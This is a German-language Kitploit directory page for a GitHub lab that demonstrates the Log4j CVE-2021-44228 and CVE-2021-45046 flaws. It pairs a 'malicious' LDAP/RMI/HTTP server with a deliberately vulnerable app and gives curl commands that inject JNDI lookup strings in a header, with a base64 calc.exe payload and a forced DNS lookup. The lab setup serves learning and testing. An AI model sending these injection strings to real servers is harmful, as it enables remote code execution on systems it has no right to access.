Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-cve-2021-44228 — Log4j CVE-2021-44228 Beispiele: Remote-Code-Ausführung (über LDAP, RMI, ...), erzwungene DNS-Abfragen, ... | Kitploit
Tools/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Log4j CVE-2021-44228 Beispiele: Remote-Code-Ausführung (über LDAP, RMI, ...), erzwungene DNS-Abfragen, ...

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
51vor 4 JahrenNoch nicht geprüft

Log4j CVE-2021-44228 und CVE-2021-45046

Voraussetzungen

Verwenden Sie ein verwundbares JDK, zum Beispiel JDK 1.8.0_181

Verwendung

Bösartiger Server

Der bösartige Server stellt die folgenden Endpunkte bereit:

  • 1389 LDAP-Server
  • 1099 RMI-Server
  • 8081 HTTP-Server
root@kitploit:~
./gradlew :malicious-server:bootRun

Verwundbare Anwendung

Die verwundbare Anwendung stellt einen HTTP-Endpunkt auf 8082 bereit.

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Remote-Codeausführung

Wählen Sie einen Payload, der von der verwundbaren Anwendung ausgeführt werden soll, und kodieren Sie ihn in Base64. Um beispielsweise den Taschenrechner unter Windows zu öffnen: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS-Abfragen

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Tool herunterladen